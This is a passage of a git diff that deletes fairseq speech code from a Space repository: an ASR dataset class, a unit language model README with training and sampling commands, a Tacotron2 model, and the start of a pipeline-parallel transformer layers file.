-from . import data_utils -from .collaters import Seq2SeqCollater - - -class AsrDataset(FairseqDataset): - """ - A dataset representing speech and corresponding transcription. - - Args: - aud_paths: (List[str]): A list of str with paths to audio files. - aud_durations_ms (List[int]): A list of int containing the durations of - audio files. - tgt (List[torch.LongTensor]): A list of LongTensors containing the indices - of target transcriptions. - tgt_dict (~fairseq.data.Dictionary): target vocabulary. - ids (List[str]): A list of utterance IDs. - speakers (List[str]): A list of speakers corresponding to utterances. - num_mel_bins (int): Number of triangular mel-frequency bins (default: 80) - frame_length (float): Frame length in milliseconds (default: 25.0) - frame_shift (float): Frame shift in milliseconds (default: 10.0) - """ - - def __init__( - self, - aud_paths, - aud_durations_ms, - tgt, - tgt_dict, - ids, - speakers, - num_mel_bins=80, - frame_length=25.0, - frame_shift=10.0, - ): - assert frame_length > 0 - assert frame_shift > 0 - assert all(x > frame_length for x in aud_durations_ms) - self.frame_sizes = [ - int(1 + (d - frame_length) / frame_shift) for d in aud_durations_ms - ] - - assert len(aud_paths) > 0 - assert len(aud_paths) == len(aud_durations_ms) - assert len(aud_paths) == len(tgt) - assert len(aud_paths) == len(ids) - assert len(aud_paths) == len(speakers) - self.aud_paths = aud_paths - self.tgt_dict = tgt_dict - self.tgt = tgt - self.ids = ids - self.speakers = speakers - self.num_mel_bins = num_mel_bins - self.frame_length = frame_length - self.frame_shift = frame_shift - - self.s2s_collater = Seq2SeqCollater( - 0, - 1, - pad_index=self.tgt_dict.pad(), - eos_index=self.tgt_dict.eos(), - move_eos_to_beginning=True, - ) - - def __getitem__(self, index): - import torchaudio - import torchaudio.compliance.kaldi as kaldi - - tgt_item = self.tgt[index] if self.tgt is not None else None - - path = self.aud_paths[index] - if not os.path.exists(path): - raise FileNotFoundError("Audio file not found: {}".format(path)) - sound, sample_rate = torchaudio.load_wav(path) - output = kaldi.fbank( - sound, - num_mel_bins=self.num_mel_bins, - frame_length=self.frame_length, - frame_shift=self.frame_shift, - ) - output_cmvn = data_utils.apply_mv_norm(output) - - return {"id": index, "data": [output_cmvn.detach(), tgt_item]} - - def __len__(self): - return len(self.aud_paths) - - def collater(self, samples): - """Merge a list of samples to form a mini-batch. - - Args: - samples (List[int]): sample indices to collate - - Returns: - dict: a mini-batch suitable for forwarding with a Model - """ - return self.s2s_collater.collate(samples) - - def num_tokens(self, index): - return self.frame_sizes[index] - - def size(self, index): - """Return an example's size as a float or tuple. This value is used when - filtering a dataset with ``--max-positions``.""" - return ( - self.frame_sizes[index], - len(self.tgt[index]) if self.tgt is not None else 0, - ) - - def ordered_indices(self): - """Return an ordered list of indices. Batches will be constructed based - on this order.""" - return np.arange(len(self)) diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/ulm/README.md b/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/ulm/README.md deleted file mode 100644 index 01459121cebefc61fdc2eae201462aa78d699111..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/ulm/README.md +++ /dev/null @@ -1,72 +0,0 @@ -# Unit Language Model (ULM) - -Here you can find links to the pre-trained ULMs and instructions on training new models using fairseq. At the end of the page, we also share how to run sampling for those models and provide pointers to the transcribed prompts we used. - -## Pre-trained models - -Using the links below, you can download pre-trained models for various unit types and vocabulary sizes: - -| | 50 | 100 | 200 -|-|-|-|- -| LogMel Filterbank | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/logmel/lm_km50/logmel50_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/logmel/lm_km100/logmel100_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/logmel/lm_km200/logmel200_lm.tgz) -| Modified CPC | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/cpc/lm_km50/cpc50_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/cpc/lm_km100/cpc100_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/cpc/lm_km200/cpc200_lm.tgz) -| HuBERT | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/hubert/lm_km50/hubert50_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/hubert/lm_km100/hubert100_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/hubert/lm_km200/hubert200_lm.tgz) -| Wav2Vec 2.0 | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/w2v2/lm_km50/w2v2_50_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/w2v2/lm_km100/w2v2_100_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/w2v2/lm_km200/w2v2_200_lm.tgz) - - -## Preprocessing data -Assuming that unit-transcribed train, valid, and test sets are located in `data/train.txt`, `data/valid.txt`, and `data/test.txt`, respectively, -we run the following command to get a preprocessed version of the datast in `data-bin`: - -```bash -fairseq-preprocess --only-source \ - --trainpref data/train.txt --validpref data/valid.txt --testpref data/test.txt \ - --destdir data-bin/ --workers 40 -``` -As a result, the `data-bin` directory should appear. - -## Fitting a Unit Language Model (ULM) -As an ULM, we train a standard fairseq Transformer LM. Assuming 8 GPUs used for training, a good starting point for an ULM training would be: -```bash - fairseq-train data-bin/ \ - --task=language_modeling \ - --arch=transformer_lm_big \ - --share-decoder-input-output-embed \ - --dropout=0.1 \ - --attention-dropout=0.1 \ - --optimizer=adam \ - --adam-betas='(0.9, 0.98)' \ - --clip-norm=1.0 \ - --lr=0.0005 \ - --lr-scheduler=inverse_sqrt \ - --warmup-updates=4000 \ - --warmup-init-lr=1e-07 \ - --tokens-per-sample=3072 \ - --update-freq=16 \ - --max-tokens=4096 \ - --num-workers=4 \ - --skip-invalid-size-inputs-valid-test \ - --max-update=500000 \ - --log-interval=10 \ - --seed=100501 \ - --fp16 \ - --sample-break-mode=eos -``` -This command will train a Transformer-large model (12 layers). You can train other standard LM models provided by fairseq, e.g. specify `--arch=transformer_lm` to train a smaller (6-layer) Transformer model. When training with a different number of GPUs, it might be a good idea to adjust the `update-freq` parameter. To save the GPU memory at an expense of additional computation, it can be useful to enable activation checkpointing with `--checkpoint-activations`. - -## Sampling from an ULM -Once an ULM was trained, we can use it for generating new utterances. Suppose, that the prompts are given in a file named `prompts.txt`. Then we can sample continuations by running the following command: - -```bash - python sample.py data-bin/ \ - --path=checkpoints/checkpoint_best.pt --task=language_modeling --sampling --temperature=0.7 \ - --seed=1 --prompts=prompts.txt --output=samples.txt --max-len-a=0 --max-len-b=500 \ - --prefix-size=-1 --batch-size=16 --fp16 --samples-per-prompt=10 -``` -Here, `--prefix-size` controls the number of tokens that are used to prime the ULM. When set to a positive value, the sampling script will take first `prefix-size` tokens to prompt the ULM; with `0` it runs unconditional sampling and with `-1` the entire prompt is used. -`--samples-per-prompt` specifies how many utterances are generated with every prompt which can be useful when generating multiple prompt continuations. In this command, `--max-len-a` and `--max-len-b` control the number of generated tokens. - -When using a pretrained model from above, `data-bin` should point to the unpacked directory (with `dict.txt` file). - -Evaluation-time, to generate prompts, we used utterances from LibriSpeech dev-clean and test-clean that are longer than 6s. We took first 3s from an utterance as a prompt. Unit transcripts of those prompts can be downloaded here: [[dev]](https://dl.fbaipublicfiles.com/textless_nlp/gslm/eval_data/dev_prompts.tgz) [[test]](https://dl.fbaipublicfiles.com/textless_nlp/gslm/eval_data/test_prompts.tgz) - diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/unit2speech/tacotron2/model.py b/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/unit2speech/tacotron2/model.py deleted file mode 100644 index ccf132b150a7cc1c125c1190b5fd8f43edaae685..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/unit2speech/tacotron2/model.py +++ /dev/null @@ -1,669 +0,0 @@ -from math import sqrt -import torch -import torch.distributions as distr -from torch.autograd import Variable -from torch import nn -from torch.nn import functional as F -from .layers import ConvNorm, LinearNorm, GlobalAvgPool -from .utils import to_gpu, get_mask_from_lengths - - -class LocationLayer(nn.Module): - def __init__(self, attention_n_filters, attention_kernel_size, - attention_dim): - super(LocationLayer, self).__init__() - padding = int((attention_kernel_size - 1) / 2) - self.location_conv = ConvNorm(2, attention_n_filters, - kernel_size=attention_kernel_size, - padding=padding, bias=False, stride=1, - dilation=1) - self.location_dense = LinearNorm(attention_n_filters, attention_dim, - bias=False, w_init_gain='tanh') - - def forward(self, attention_weights_cat): - processed_attention = self.location_conv(attention_weights_cat) - processed_attention = processed_attention.transpose(1, 2) - processed_attention = self.location_dense(processed_attention) - return processed_attention - - -class Attention(nn.Module): - def __init__(self, attention_rnn_dim, embedding_dim, attention_dim, - attention_location_n_filters, attention_location_kernel_size): - super(Attention, self).__init__() - self.query_layer = LinearNorm(attention_rnn_dim, attention_dim, - bias=False, w_init_gain='tanh') - self.memory_layer = LinearNorm(embedding_dim, attention_dim, bias=False, - w_init_gain='tanh') - self.v = LinearNorm(attention_dim, 1, bias=False) - self.location_layer = LocationLayer(attention_location_n_filters, - attention_location_kernel_size, - attention_dim) - self.score_mask_value = -float("inf") - - def get_alignment_energies(self, query, processed_memory, - attention_weights_cat): - """ - PARAMS - ------ - query: decoder output (batch, n_mel_channels * n_frames_per_step) - processed_memory: processed encoder outputs (B, T_in, attention_dim) - attention_weights_cat: cumulative and prev. att weights (B, 2, max_time) - - RETURNS - ------- - alignment (batch, max_time) - """ - - processed_query = self.query_layer(query.unsqueeze(1)) - processed_attention_weights = self.location_layer(attention_weights_cat) - energies = self.v(torch.tanh( - processed_query + processed_attention_weights + processed_memory)) - - energies = energies.squeeze(-1) - return energies - - def forward(self, attention_hidden_state, memory, processed_memory, - attention_weights_cat, mask): - """ - PARAMS - ------ - attention_hidden_state: attention rnn last output - memory: encoder outputs - processed_memory: processed encoder outputs - attention_weights_cat: previous and cummulative attention weights - mask: binary mask for padded data - """ - alignment = self.get_alignment_energies( - attention_hidden_state, processed_memory, attention_weights_cat) - - if mask is not None: - alignment.data.masked_fill_(mask, self.score_mask_value) - - attention_weights = F.softmax(alignment, dim=1) - attention_context = torch.bmm(attention_weights.unsqueeze(1), memory) - attention_context = attention_context.squeeze(1) - - return attention_context, attention_weights - - -class Prenet(nn.Module): - def __init__(self, in_dim, sizes): - super(Prenet, self).__init__() - in_sizes = [in_dim] + sizes[:-1] - self.layers = nn.ModuleList( - [LinearNorm(in_size, out_size, bias=False) - for (in_size, out_size) in zip(in_sizes, sizes)]) - - def forward(self, x): - for linear in self.layers: - x = F.dropout(F.relu(linear(x)), p=0.5, training=True) - return x - - -class Postnet(nn.Module): - """Postnet - - Five 1-d convolution with 512 channels and kernel size 5 - """ - - def __init__(self, hparams): - super(Postnet, self).__init__() - self.convolutions = nn.ModuleList() - - self.convolutions.append( - nn.Sequential( - ConvNorm(hparams.n_mel_channels, hparams.postnet_embedding_dim, - kernel_size=hparams.postnet_kernel_size, stride=1, - padding=int((hparams.postnet_kernel_size - 1) / 2), - dilation=1, w_init_gain='tanh'), - nn.BatchNorm1d(hparams.postnet_embedding_dim)) - ) - - for i in range(1, hparams.postnet_n_convolutions - 1): - self.convolutions.append( - nn.Sequential( - ConvNorm(hparams.postnet_embedding_dim, - hparams.postnet_embedding_dim, - kernel_size=hparams.postnet_kernel_size, stride=1, - padding=int((hparams.postnet_kernel_size - 1) / 2), - dilation=1, w_init_gain='tanh'), - nn.BatchNorm1d(hparams.postnet_embedding_dim)) - ) - - self.convolutions.append( - nn.Sequential( - ConvNorm(hparams.postnet_embedding_dim, hparams.n_mel_channels, - kernel_size=hparams.postnet_kernel_size, stride=1, - padding=int((hparams.postnet_kernel_size - 1) / 2), - dilation=1, w_init_gain='linear'), - nn.BatchNorm1d(hparams.n_mel_channels)) - ) - - def forward(self, x): - for i in range(len(self.convolutions) - 1): - x = F.dropout(torch.tanh(self.convolutions[i](x)), 0.5, self.training) - x = F.dropout(self.convolutions[-1](x), 0.5, self.training) - - return x - - -class Encoder(nn.Module): - """Encoder module: - - Three 1-d convolution banks - - Bidirectional LSTM - """ - def __init__(self, hparams): - super(Encoder, self).__init__() - - convolutions = [] - for _ in range(hparams.encoder_n_convolutions): - conv_layer = nn.Sequential( - ConvNorm(hparams.encoder_embedding_dim, - hparams.encoder_embedding_dim, - kernel_size=hparams.encoder_kernel_size, stride=1, - padding=int((hparams.encoder_kernel_size - 1) / 2), - dilation=1, w_init_gain='relu'), - nn.BatchNorm1d(hparams.encoder_embedding_dim)) - convolutions.append(conv_layer) - self.convolutions = nn.ModuleList(convolutions) - - self.lstm = nn.LSTM(hparams.encoder_embedding_dim, - int(hparams.encoder_embedding_dim / 2), 1, - batch_first=True, bidirectional=True) - - def forward(self, x, input_lengths): - for conv in self.convolutions: - x = F.dropout(F.relu(conv(x)), 0.5, self.training) - - x = x.transpose(1, 2) - - # pytorch tensor are not reversible, hence the conversion - input_lengths = input_lengths.cpu().numpy() - x = nn.utils.rnn.pack_padded_sequence( - x, input_lengths, batch_first=True) - - self.lstm.flatten_parameters() - outputs, _ = self.lstm(x) - - outputs, _ = nn.utils.rnn.pad_packed_sequence( - outputs, batch_first=True) - - return outputs - - def inference(self, x): - for conv in self.convolutions: - x = F.dropout(F.relu(conv(x)), 0.5, self.training) - - x = x.transpose(1, 2) - - self.lstm.flatten_parameters() - outputs, _ = self.lstm(x) - - return outputs - - -class AudioEncoder(nn.Module): - def __init__(self, hparams): - super(AudioEncoder, self).__init__() - - assert hparams.lat_dim > 0 - - convolutions = [] - inp_dim = hparams.n_mel_channels - for _ in range(hparams.lat_n_convolutions): - conv_layer = nn.Sequential( - ConvNorm(inp_dim, hparams.lat_n_filters, - kernel_size=hparams.lat_kernel_size, stride=1, - padding=int((hparams.lat_kernel_size - 1) / 2), - dilation=1, w_init_gain='tanh'), - nn.BatchNorm1d(hparams.lat_n_filters)) - inp_dim = hparams.lat_n_filters - convolutions.append(conv_layer) - self.convolutions = nn.ModuleList(convolutions) - - self.lstm = nn.LSTM(hparams.lat_n_filters, - int(hparams.lat_n_filters / 2), - hparams.lat_n_blstms, batch_first=True, - bidirectional=True) - self.pool = GlobalAvgPool() - - self.mu_proj = LinearNorm(hparams.lat_n_filters, hparams.lat_dim) - self.logvar_proj = LinearNorm(hparams.lat_n_filters, hparams.lat_dim) - self.lat_dim = hparams.lat_dim - - def forward(self, x, lengths): - """ - Args: - x (torch.Tensor): (B, F, T) - """ - - for conv in self.convolutions: - x = F.dropout(F.tanh(conv(x)), 0.5, self.training) - - x = x.transpose(1, 2) # (B, T, D) - - # x may not be sorted by length. Sort->process->unsort - max_len = x.size(1) - assert max_len == torch.max(lengths).item() - - lengths, perm_idx = lengths.sort(0, descending=True) - x = x[perm_idx] - x = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True) - - self.lstm.flatten_parameters() - outputs, _ = self.lstm(x) - outputs, _ = nn.utils.rnn.pad_packed_sequence(outputs, batch_first=True) - - _, unperm_idx = perm_idx.sort(0) - outputs = outputs[unperm_idx] # (B, T, D) - lengths = lengths[unperm_idx] # (B, T, D) - - outputs = self.pool(outputs, lengths) # (B, D) - - mu = self.mu_proj(outputs) - logvar = self.logvar_proj(outputs) - z = distr.Normal(mu, logvar).rsample() - return z, mu, logvar - - -class Decoder(nn.Module): - def __init__(self, hparams): - super(Decoder, self).__init__() - self.n_mel_channels = hparams.n_mel_channels - self.n_frames_per_step = hparams.n_frames_per_step - self.encoder_embedding_dim = hparams.encoder_embedding_dim - self.obs_dim = hparams.obs_dim - self.lat_dim = hparams.lat_dim - self.attention_rnn_dim = hparams.attention_rnn_dim - self.decoder_rnn_dim = hparams.decoder_rnn_dim - self.prenet_dim = hparams.prenet_dim - self.max_decoder_steps = hparams.max_decoder_steps - self.gate_threshold = hparams.gate_threshold - self.p_attention_dropout = hparams.p_attention_dropout - self.p_decoder_dropout = hparams.p_decoder_dropout - - self.prenet = Prenet( - hparams.n_mel_channels * hparams.n_frames_per_step, - [hparams.prenet_dim, hparams.prenet_dim]) - - self.attention_rnn = nn.LSTMCell( - hparams.prenet_dim + hparams.encoder_embedding_dim, - hparams.attention_rnn_dim) - - self.attention_layer = Attention( - hparams.attention_rnn_dim, hparams.encoder_embedding_dim, - hparams.attention_dim, hparams.attention_location_n_filters, - hparams.attention_location_kernel_size) - - encoder_tot_dim = (hparams.encoder_embedding_dim + \ - hparams.lat_dim + hparams.obs_dim) - self.decoder_rnn = nn.LSTMCell( - hparams.attention_rnn_dim + encoder_tot_dim, - hparams.decoder_rnn_dim, 1) - - self.linear_projection = LinearNorm( - hparams.decoder_rnn_dim + encoder_tot_dim, - hparams.n_mel_channels * hparams.n_frames_per_step) - - self.gate_layer = LinearNorm( - hparams.decoder_rnn_dim + encoder_tot_dim, 1, - bias=True, w_init_gain='sigmoid') - - def get_go_frame(self, memory): - """ Gets all zeros frames to use as first decoder input - PARAMS - ------ - memory: decoder outputs - - RETURNS - ------- - decoder_input: all zeros frames - """ - B = memory.size(0) - decoder_input = Variable(memory.data.new( - B, self.n_mel_channels * self.n_frames_per_step).zero_()) - return decoder_input - - def initialize_decoder_states(self, memory, obs_and_lat, mask): - """ Initializes attention rnn states, decoder rnn states, attention - weights, attention cumulative weights, attention context, stores memory - and stores processed memory - PARAMS - ------ - memory: Encoder outputs - obs_and_lat: Observed and latent attribute embeddings - mask: Mask for padded data if training, expects None for inference - """ - B = memory.size(0) - MAX_TIME = memory.size(1) - - self.attention_hidden = Variable(memory.data.new( - B, self.attention_rnn_dim).zero_()) - self.attention_cell = Variable(memory.data.new( - B, self.attention_rnn_dim).zero_()) - - self.decoder_hidden = Variable(memory.data.new( - B, self.decoder_rnn_dim).zero_()) - self.decoder_cell = Variable(memory.data.new( - B, self.decoder_rnn_dim).zero_()) - - self.attention_weights = Variable(memory.data.new( - B, MAX_TIME).zero_()) - self.attention_weights_cum = Variable(memory.data.new( - B, MAX_TIME).zero_()) - self.attention_context = Variable(memory.data.new( - B, self.encoder_embedding_dim).zero_()) - - self.memory = memory - self.processed_memory = self.attention_layer.memory_layer(memory) - self.obs_and_lat = obs_and_lat - self.mask = mask - - def parse_decoder_inputs(self, decoder_inputs): - """ Prepares decoder inputs, i.e. mel outputs - PARAMS - ------ - decoder_inputs: inputs used for teacher-forced training, i.e. mel-specs - - RETURNS - ------- - inputs: processed decoder inputs - - """ - # (B, n_mel_channels, T_out) -> (B, T_out, n_mel_channels) - decoder_inputs = decoder_inputs.transpose(1, 2) - decoder_inputs = decoder_inputs.view( - decoder_inputs.size(0), - int(decoder_inputs.size(1)/self.n_frames_per_step), -1) - # (B, T_out, n_mel_channels) -> (T_out, B, n_mel_channels) - decoder_inputs = decoder_inputs.transpose(0, 1) - return decoder_inputs - - def parse_decoder_outputs(self, mel_outputs, gate_outputs, alignments): - """ Prepares decoder outputs for output - PARAMS - ------ - mel_outputs: - gate_outputs: gate output energies - alignments: - - RETURNS - ------- - mel_outputs: - gate_outpust: gate output energies - alignments: - """ - # (T_out, B) -> (B, T_out) - alignments = torch.stack(alignments).transpose(0, 1) - # (T_out, B) -> (B, T_out) - gate_outputs = torch.stack(gate_outputs).transpose(0, 1) - gate_outputs = gate_outputs.contiguous() - # (T_out, B, n_mel_channels) -> (B, T_out, n_mel_channels) - mel_outputs = torch.stack(mel_outputs).transpose(0, 1).contiguous() - # decouple frames per step - mel_outputs = mel_outputs.view( - mel_outputs.size(0), -1, self.n_mel_channels) - # (B, T_out, n_mel_channels) -> (B, n_mel_channels, T_out) - mel_outputs = mel_outputs.transpose(1, 2) - - return mel_outputs, gate_outputs, alignments - - def decode(self, decoder_input): - """ Decoder step using stored states, attention and memory - PARAMS - ------ - decoder_input: previous mel output - - RETURNS - ------- - mel_output: - gate_output: gate output energies - attention_weights: - """ - cell_input = torch.cat((decoder_input, self.attention_context), -1) - self.attention_hidden, self.attention_cell = self.attention_rnn( - cell_input, (self.attention_hidden, self.attention_cell)) - self.attention_hidden = F.dropout( - self.attention_hidden, self.p_attention_dropout, self.training) - - attention_weights_cat = torch.cat( - (self.attention_weights.unsqueeze(1), - self.attention_weights_cum.unsqueeze(1)), dim=1) - self.attention_context, self.attention_weights = self.attention_layer( - self.attention_hidden, self.memory, self.processed_memory, - attention_weights_cat, self.mask) - - self.attention_weights_cum += self.attention_weights - decoder_input = torch.cat( - (self.attention_hidden, self.attention_context), -1) - if self.obs_and_lat is not None: - decoder_input = torch.cat((decoder_input, self.obs_and_lat), -1) - self.decoder_hidden, self.decoder_cell = self.decoder_rnn( - decoder_input, (self.decoder_hidden, self.decoder_cell)) - self.decoder_hidden = F.dropout( - self.decoder_hidden, self.p_decoder_dropout, self.training) - - decoder_hidden_attention_context = torch.cat( - (self.decoder_hidden, self.attention_context), dim=1) - if self.obs_and_lat is not None: - decoder_hidden_attention_context = torch.cat( - (decoder_hidden_attention_context, self.obs_and_lat), dim=1) - decoder_output = self.linear_projection( - decoder_hidden_attention_context) - - gate_prediction = self.gate_layer(decoder_hidden_attention_context) - return decoder_output, gate_prediction, self.attention_weights - - def forward(self, memory, obs_and_lat, decoder_inputs, memory_lengths): - """ Decoder forward pass for training - PARAMS - ------ - memory: Encoder outputs - obs_and_lat: Observed and latent attribute embeddings - decoder_inputs: Decoder inputs for teacher forcing. i.e. mel-specs - memory_lengths: Encoder output lengths for attention masking. - - RETURNS - ------- - mel_outputs: mel outputs from the decoder - gate_outputs: gate outputs from the decoder - alignments: sequence of attention weights from the decoder - """ - - decoder_input = self.get_go_frame(memory).unsqueeze(0) - decoder_inputs = self.parse_decoder_inputs(decoder_inputs) - decoder_inputs = torch.cat((decoder_input, decoder_inputs), dim=0) - decoder_inputs = self.prenet(decoder_inputs) - - self.initialize_decoder_states( - memory, obs_and_lat, mask=~get_mask_from_lengths(memory_lengths)) - - mel_outputs, gate_outputs, alignments = [], [], [] - while len(mel_outputs) < decoder_inputs.size(0) - 1: - decoder_input = decoder_inputs[len(mel_outputs)] - mel_output, gate_output, attention_weights = self.decode( - decoder_input) - mel_outputs += [mel_output.squeeze(1)] - gate_outputs += [gate_output.squeeze()] - alignments += [attention_weights] - - mel_outputs, gate_outputs, alignments = self.parse_decoder_outputs( - mel_outputs, gate_outputs, alignments) - - return mel_outputs, gate_outputs, alignments - - def inference(self, memory, obs_and_lat, ret_has_eos=False): - """ Decoder inference - PARAMS - ------ - memory: Encoder outputs - obs_and_lat: Observed and latent attribute embeddings - - RETURNS - ------- - mel_outputs: mel outputs from the decoder - gate_outputs: gate outputs from the decoder - alignments: sequence of attention weights from the decoder - """ - decoder_input = self.get_go_frame(memory) - - self.initialize_decoder_states(memory, obs_and_lat, mask=None) - - mel_outputs, gate_outputs, alignments = [], [], [] - has_eos = False - while True: - decoder_input = self.prenet(decoder_input) - mel_output, gate_output, alignment = self.decode(decoder_input) - - mel_outputs += [mel_output.squeeze(1)] - gate_outputs += [gate_output] - alignments += [alignment] - - if torch.sigmoid(gate_output.data) > self.gate_threshold: - has_eos = True - break - elif len(mel_outputs) == self.max_decoder_steps: - # print("Warning! Reached max decoder steps") - break - - decoder_input = mel_output - - mel_outputs, gate_outputs, alignments = self.parse_decoder_outputs( - mel_outputs, gate_outputs, alignments) - - if ret_has_eos: - return mel_outputs, gate_outputs, alignments, has_eos - else: - return mel_outputs, gate_outputs, alignments - - -class Tacotron2(nn.Module): - def __init__(self, hparams): - super(Tacotron2, self).__init__() - self.mask_padding = hparams.mask_padding - self.fp16_run = hparams.fp16_run - self.n_mel_channels = hparams.n_mel_channels - self.n_frames_per_step = hparams.n_frames_per_step - - # initialize text encoder embedding - self.embedding = nn.Embedding( - hparams.n_symbols, hparams.symbols_embedding_dim) - std = sqrt(2.0 / (hparams.n_symbols + hparams.symbols_embedding_dim)) - val = sqrt(3.0) * std # uniform bounds for std - self.embedding.weight.data.uniform_(-val, val) - - # initialize observed attribute embedding - self.obs_embedding = None - if hparams.obs_dim > 0: - self.obs_embedding = nn.Embedding( - hparams.obs_n_class, hparams.obs_dim) - std = sqrt(2.0 / (hparams.obs_n_class + hparams.obs_dim)) - val = sqrt(3.0) * std # uniform bounds for std - self.obs_embedding.weight.data.uniform_(-val, val) - - self.encoder = Encoder(hparams) - self.decoder = Decoder(hparams) - self.postnet = Postnet(hparams) - - self.lat_encoder = None - if hparams.lat_dim > 0: - self.lat_encoder = AudioEncoder(hparams) - - def parse_batch(self, batch): - (text_padded, input_lengths, obs_labels, - mel_padded, gate_padded, output_lengths) = batch - text_padded = to_gpu(text_padded).long() - input_lengths = to_gpu(input_lengths).long() - obs_labels = to_gpu(obs_labels).long() - max_len = torch.max(input_lengths.data).item() - mel_padded = to_gpu(mel_padded).float() - gate_padded = to_gpu(gate_padded).float() - output_lengths = to_gpu(output_lengths).long() - - return ( - (text_padded, input_lengths, obs_labels, - mel_padded, max_len, output_lengths), - (mel_padded, gate_padded)) - - def parse_output(self, outputs, output_lengths=None): - if self.mask_padding and output_lengths is not None: - mask = ~get_mask_from_lengths(output_lengths) - mask = mask.expand(self.n_mel_channels, mask.size(0), mask.size(1)) - mask = mask.permute(1, 0, 2) - - outputs[0].data.masked_fill_(mask, 0.0) - outputs[1].data.masked_fill_(mask, 0.0) - outputs[2].data.masked_fill_(mask[:, 0, :], 1e3) # gate energies - - return outputs - - def forward(self, inputs): - (text_inputs, text_lengths, obs_labels, - mels, max_len, output_lengths) = inputs - text_lengths, output_lengths = text_lengths.data, output_lengths.data - - embedded_inputs = self.embedding(text_inputs).transpose(1, 2) - - encoder_outputs = self.encoder(embedded_inputs, text_lengths) - - obs = None - if self.obs_embedding is not None: - obs = self.obs_embedding(obs_labels) - - lat, lat_mu, lat_logvar = None, None, None - if self.lat_encoder is not None: - (lat, lat_mu, lat_logvar) = self.lat_encoder(mels, output_lengths) - - obs_and_lat = [x for x in [obs, lat] if x is not None] - if bool(obs_and_lat): - obs_and_lat = torch.cat(obs_and_lat, dim=-1) - else: - obs_and_lat = None - - mel_outputs, gate_outputs, alignments = self.decoder( - encoder_outputs, obs_and_lat, mels, memory_lengths=text_lengths) - - mel_outputs_postnet = self.postnet(mel_outputs) - mel_outputs_postnet = mel_outputs + mel_outputs_postnet - - return self.parse_output( - [mel_outputs, mel_outputs_postnet, gate_outputs, alignments, - lat_mu, lat_logvar], - output_lengths) - - def inference(self, inputs, obs_labels=None, lat=None, ret_has_eos=False): - embedded_inputs = self.embedding(inputs).transpose(1, 2) - encoder_outputs = self.encoder.inference(embedded_inputs) - - if obs_labels is None: - obs_labels = torch.LongTensor(len(inputs)) - obs_labels = obs_labels.to(inputs.device).zero_() - - obs = None - if self.obs_embedding is not None: - obs = self.obs_embedding(obs_labels) - - if self.lat_encoder is not None: - if lat is None: - lat = torch.FloatTensor(len(inputs), self.lat_encoder.lat_dim) - lat = lat.to(inputs.device).zero_().type(encoder_outputs.type()) - - obs_and_lat = [x for x in [obs, lat] if x is not None] - if bool(obs_and_lat): - obs_and_lat = torch.cat(obs_and_lat, dim=-1) - else: - obs_and_lat = None - - mel_outputs, gate_outputs, alignments, has_eos = self.decoder.inference( - encoder_outputs, obs_and_lat, ret_has_eos=True) - - mel_outputs_postnet = self.postnet(mel_outputs) - mel_outputs_postnet = mel_outputs + mel_outputs_postnet - - outputs = self.parse_output( - [mel_outputs, mel_outputs_postnet, gate_outputs, alignments]) - - if ret_has_eos: - return outputs + [has_eos] - else: - return outputs diff --git a/spaces/mshukor/UnIVAL/fairseq/fairseq/model_parallel/models/pipeline_parallel_transformer/layers.py b/spaces/mshukor/UnIVAL/fairseq/fairseq/model_parallel/models/pipeline_parallel_transformer/layers.py deleted file mode 100644 index eb81ded341257ba0a43c4d0867e8f3c83f276bc7..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/fairseq/model_parallel/models/pipeline_parallel_transformer/layers.py +++ /dev/null @@ -1,600 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math -from collections import namedtuple - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq import options, utils -from fairseq.modules import ( - AdaptiveSoftmax, - LayerNorm, - MultiheadAttention, - PositionalEmbedding, -) - - -EncoderOut = namedtuple( - "TransformerEncoderOut", - [ - "encoder_out", # T x B x C - "encoder_padding_mask", # B x T - "encoder_embedding", # B x T x C - "encoder_states", # List[T x B x C] - ], -) - - -class TransformerEncoderEmbedding(nn.Module): - """ Encoder Embedding + Positional Embedding """ - - def __init__(self, args, embed_tokens): - super().__init__() - self.dropout = args.dropout - self.max_source_positions = args.max_source_positions - self.embed_tokens = embed_tokens - if isinstance(embed_tokens, nn.ModuleList): - self.padding_idx = embed_tokens[0].padding_idx - embed_dim = sum(e.embedding_dim for e in embed_tokens) - else: - self.padding_idx = embed_tokens.padding_idx - embed_dim = embed_tokens.embedding_dim - self.embed_scale = math.sqrt(embed_dim) - self.embed_positions = ( - PositionalEmbedding( - args.max_source_positions, - embed_dim, - self.padding_idx, - learned=args.encoder_learned_pos, - ) - if not args.no_token_positional_embeddings - else None - ) - if getattr(args, "layernorm_embedding", False): - self.layernorm_embedding = LayerNorm(embed_dim) - else: - self.layernorm_embedding = None - - def forward(self, input): - # embed tokens and positions - src_tokens = input[0] - prev_output_tokens = input[2] - if isinstance(self.embed_tokens, nn.ModuleList): - x_embed_list = [] - for embed_tokens_part in self.embed_tokens: - x_embed_list.append(embed_tokens_part(src_tokens)) - - embedded = torch.cat(x_embed_list, dim=-1) - else: - embedded = self.embed_tokens(src_tokens) - x = embed = self.embed_scale * embedded - if self.embed_positions is not None: - x = embed + 